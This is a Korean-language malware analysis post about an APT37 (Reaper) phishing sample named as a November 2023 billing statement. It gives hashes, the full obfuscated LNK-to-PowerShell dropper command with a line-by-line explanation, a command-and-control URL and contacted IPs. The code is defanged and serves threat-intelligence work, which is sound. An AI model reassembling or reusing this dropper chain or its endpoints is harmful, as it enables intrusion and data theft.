북한 해킹 단체 APT37 Reaper(리퍼)에서 만든 악성코드-2023년 11월 청구내역.html(2023.11.07)

오늘은 북한 해킹 단체 APT37 Reaper(리퍼)에서 만든 악성코드 인 2023년 11월 청구내역.html(2023.11.07)에 대해 알아보겠습니다.
Reaper 또는 Group123 이라고 부르고 있고 Reaper(리퍼) 라고 부르는 APT 공격 단체이며 2012년부터 활동을 시작했고 정보 수집, 정찰 및 사이버 스파이 활동을 목적으로 하며, 정부, 군사, 대기업, 인권 단체를 대상으로 하고 있으며 즉 한국의 외교 및 국내 문제에 초점이 맞추어져 있으며 일본, 베트남, 중동 및 기타 지역의 기업을 대상으로 해서 회사 기밀 등을 탈취하고 있습니다. (화학,전자,제조,항공 우주, 자동차,의료)
APT37,Inky Squid,RedEyes,ScarCruft,Ricochet Chollima 등으로 이름으로 활동을 하고 있습니다. 록랫(RokRAT)은 마이크로소프트 오피스 에서 매크로를 기본 값을 사용 안 함 그리고 사용자 인식 개선들의 이유로 매크로를 통한 약발이 안 먹히는지 최근 lnk 파일 형식으로 유포하고 있으며
자격 증명 도용, 데이터 유출, 스크린 샷 캡처, 시스템 정보 수집, 명령 및 셸 코드 실행, 파일 및 디렉터리 관리에 사용됩니다. Reaper는 종종 C2용 클라우드 스토리지 서비스를 사용하는 것이 특징입니다.
ROKRAT 감염 체인을 분석하는 동안 지하 포럼에서 판매되는 상업용 RAT인 Amadey를 배포하는 유사한 체인을 사용하는 것이 특징입니다. 그리고 기본적으로 예를 들어서 2023년 11월 청구내역.zip이라는 이름으로 유포 여기에는 HWP 미끼 파일이 있고 공격 방식은 국회 웹사이트에 있는 파일 가져 와서 공격에 사용합니다.
공격 방식은 압축파일->미끼 lnk 파일->PowerShell 실행->vbs 스크립트 개인정보 탈취이라는 방식을 사용하고 있습니다.

Cerbero Suite Advanced 본 악성코드 파워셀

악성코드 해쉬값
파일명:2023년 11월 청구내역.lnk.zip
사이즈:98.4 KB
MD5:e9a37e9c9ebccce3c3e8cbdd865d25ed
SHA-1:47b4ff5fa114eb477e56fe29969e803e96594eab
SHA-256:6b148003f22e1c10f18de9ca3eb71702a895ec139c0dae7b4fedc78e3bef36be
압축 해제할 때 해쉬값
파일명:2023년 11월 청구내역.lnk.lnk
사이즈:41.2 MB
MD5:015ba89bce15c66baebc5fd94d03d19e
SHA-1:5e6bda109741fc9a5492030f653fb1fa3e5e0c53
SHA-256:92ae1fb12ca2907460e120d09e43f358dfd99ca656a35ac7fb2198eb7c9b60f2

PowerShell 스크립트 악성코드

LinkTargetIDList
{
 // not present
}

StringData
{
 namestring: 
 relativepath: not present
 workingdir: not present
 commandlinearguments: /q /c Set S=tD3mE5gpZH(s)UP(I)jlvMkA6uNocWQx(B)e8Cdn09YRrfLaw
 G(1)KFVySqzThO27iX(b)J4 && c(a)ll %S:~7,1(%)%S:~(2)3,1(%)%S:~42,1%%S
 :(~)29,1(%)%S:~(3)8,1%(%)S:~(1)0,1%(%)S:~53,1%(%)S:~(2)9,1(%)%S:~(
 1)5,1(%)%S:(~)1(5),1% -%S:~42,1%(%)S:~57,1%(%)S:~3(3),1%(%)S:~
 3(2),1(%)%S:~2(3),1%(%)S:~4(2),1%(%)S:~1(0),1%(%)S:~(0),1(%)%
 S:~4(8),1(%)%S:~1(5),1%(%)S:~(2)9,1% %S:~53,1%(%)S:~57,1%(%)S
 :~3(2),1(%)%S:~(3)2,1%(%)S:~(2)9,1(%)%S:~3(3),1% "$M(B)b6uBpQ
 dg = Get-Loc(a)tion;$KobkZ9 = Get(-)ChildItem (-)Path $MBb6uB
 pQdg -Recurse *(.)lnk | where-object {$_.(l)ength -eq 0x0(2)9
 40000} | Select(-)Object -Expan(d)Property Fu(l)lName;if($Kob
 k(Z)9.leng(t)h -eq 0) {$MBb6uBpQd(g) = $env(:)Temp;$Ko(b)kZ9 
 = (G)et-ChildItem -Path $MBb6uBpQdg -Recurse *(.)lnk | wh(e)r
 e(-)object {$_.length -eq 0x02940000} | Select-Object -Expan(
 d)Pr(o)perty FullName;};$MBb6(u)BpQdg = Spl(i)t-Path $KobkZ9;
 $QAxAcqVC7rzJ(t)A (=) New(-)Object Sys(t)em.IO.FileStream($Ko
 (b)kZ9, [System.IO.File(M)ode]::Open, [System.IO.FileAcc(e)ss
 ]::Re(a)(d);$QA(x)AcqVC(7)rzJtA.Seek(0x00001A12, [System.IO.S
 eekOri(g)in]::Begi(n);$c(I)599Sy = (N)ew-Object byte[] 0x0000
 055D;$QAxAcqVC7rzJtA.Read($cI599Sy, 0, 0x0000055D);$mLm_7xc =
 $MBb6uBpQdg + '\' + [regex]::unescape('2000215005_20231107_20
 231127_rvim.html');sc $mLm_7xc $cI599Sy -Encoding Byte;& $mLm
 _7xc;$QAxAcqVC7rzJtA.Seek(0x00001F6F, [System.IO.SeekOrigin]:
 :Begin);$IhLf7M=New-Object byte[] 0x00(0)017C(1);$QAxAcqVC(7)
 rzJtA.Read($IhLf7M, 0, 0x00001(7)C(1);$QAxAcqVC7rz(J)tA.Close
 ();Remove-Item -Path $KobkZ9 -Force;$yEOBE0=$env(:)public (+)
 '\Libraries\xt9644nb2(.)vbs';sc $yEOBE0 $IhLf7M -Encoding Byt
 e;& wscript(.)exe $y(E)O(B)E0;")
 iconlocation: (.)html
}

코드 설명

PowerShell 스크립트로 돼 있는 코드이며 코드 설명은 다음과 같습니다.
길이가 0x02940000인 확장자가 lnk인 파일을 찾아서 전체 경로를 가져옴
$KobkZ9 = Get(-)ChildItem -Path ($)MBb6uBpQdg (-)Recurse *(.)lnk | where(-)o(b)ject {$_(.)length -e(q) 0x(0)2940000} | Sel(e)c)t-Ob(j)ect -ExpandPr(o)perty Fu(l)lName;
가져온 파일 경로가 없으면 Temp 경로에서 찾음
if($KobkZ9(.)length -eq 0) {
    $MBb6uBpQ(d)g = $env:T(e)mp;
    $KobkZ9 = Get-ChildI(t)em -Path $MBb6u(B)pQdg -Recurse *(.)lnk | where-object {$_.length -eq 0x0(2)940000} | Sel(e)ct-Object -ExpandProp(e)rty FullName;
}
파일 경로에서 디렉터리만 추출
$MBb6uBpQdg = Spli(t)-Path $(K)obkZ9;
파일을 열어서 특정 위치에서 데이터를 읽음
$Q(A)xAcqVC7rzJtA = New(-)Object System.IO(.)FileStream($K(o)bkZ9, [System.IO(.)FileMode]::Op(e)n, [System.IO(.)FileAccess]::(R)ead);
$QAxAcqVC7rzJtA(.)Seek(0x00001A(1)2, [System(.)IO.SeekOrigin]::Be(g)in);
$cI599Sy = New(-)Object byte[] 0x000(0)055D;
$QAxAcqVC7rzJtA(.)Read($(c)I5(9)9Sy, 0, 0x000(0)055D);
읽은 데이터를 새로운 파일에 쓰고 실행
$mLm_7xc (=) $M(B)b6uBpQdg + '\' (+) [regex]::unesca(p)e('2000215(0)05_202(3)1107_20231(1)27_rvim(.)html');
sc $mLm(_)7xc $cI599Sy -Enco(d)ing Byte;
& $mLm(_)7xc;
파일을 다시 열어서 다른 위치에서 데이터를 읽음
$QAxAcqVC7r(z)JtA(.)Seek(0x000(0)1F6F, [System.IO(.)SeekOrigin]::B(e)gin);
$IhLf7M=New(-)Object byte[] 0x00(0)017C1;
$QAxAcqVC7rzJtA(.)Read($IhLf7M, 0, 0x(0)00017C1);
파일을 닫고 원본 파일을 강제로 삭제
$QAxAcq(V)C7rzJtA(.)Close();
Remove-Item (-)Pat(h) $K(o)bkZ9 -F(o)rce;
새로운 경로에 데이터를 저장하고 실행
$yEOB(E)0=$env:public (+) '\Libr(a)(r)ies\xt9644nb2(.)vbs';
sc $yEOBE0 $IhL(f)7M (-)Enco(d)ing Byte;
& wscript.exe $yE(O)BE0;
PowerShell 스크립트 종료
코드는 특정한 파일 경로에서 데이터를 읽어와 다른 파일에 저장하고 실행하는 작업을 수행

XOR 구성된 VBS 스크립트

xt9644nb2.vbs 내용

최종적으로 접속하는 사이트

http://ebpp(.)airport(.)kr/mail(.)do

IP 트래픽

104.18.38(.)233:80 (TCP)
104.244.42(.)65:443 (TCP)
104.244.42(.)65:80 (TCP)
104.85.1(.)163:80 (TCP)
104.86.110(.)106:80 (TCP)
116.84.245(.0100:80 (TCP)
119.205.211(.077:443 (TCP)
13.49.212(.)207:80 (TCP)
142.250.179(.)132:80 (TCP)
152.199.19(.)74:80 (TCP)
157.240.247(.)35:443 (TCP)
157.240.247(.)35:80 (TCP)
172.64.149(.)23:80 (TCP)
172.64.152(.)151:443 (TCP)
18.185.8(.)123:443 (TCP)
18.185.8(.)123:80 (TCP)
18.65.39(.020:443 (TCP)
18.65.39(.)20:80 (TCP)
185.15.59(.)224:443 (TCP)
185.15.59(.)224:80 (TCP)
185.26.182(.)103:443 (TCP)
185.26.182(.)103:80 (TCP)
185.26.182(.)109:80 (TCP)
185.26.182(.)118:80 (TCP)
192.229.221(.)95:80 (TCP)
2.18.66(.)170:443 (TCP)
2.22.5(.)73:443 (TCP)
2.23.161(.)155:443 (TCP)
2.23.161(.)155:80 (TCP)
209.140.135(.0)138:443 (TCP)
209.140.135(.)138:80 (TCP)
212.82.100(.)137:443 (TCP)
212.82.100(.)137:80 (TCP)
52.142.124(.)215:443 (TCP)
8.247.209(.)254:80 (TCP)
82.145.216(.)20:443 (TCP)
82.145.216(.)20:80 (TCP)
87.248.116(.)11:443 (TCP)

2023-11-09 00:05:16 UTC 기준 바이러스토탈에서 탐지하는 보안 업체들은 다음과 같습니다.
ALYac:Trojan.Agent.LNK.Gen
Google:Detected
Kaspersky:HEUR:Trojan.WinLNK.Rufus.gen
SentinelOne (Static ML):Static AI - Suspicious LNK
Symantec:Scr.Mallnk!gen13
Varist:LNK/ABRisk.QSLG-6
VBA32:Trojan.Link.Crafted
ZoneAlarm by Check Point:HEUR:Trojan.WinLNK.Rufus.gen
기본적인 보안 수칙을 지키면 막을 수가 있으니 기본적인 보안 수칙을 지키는 것을 권장합니다.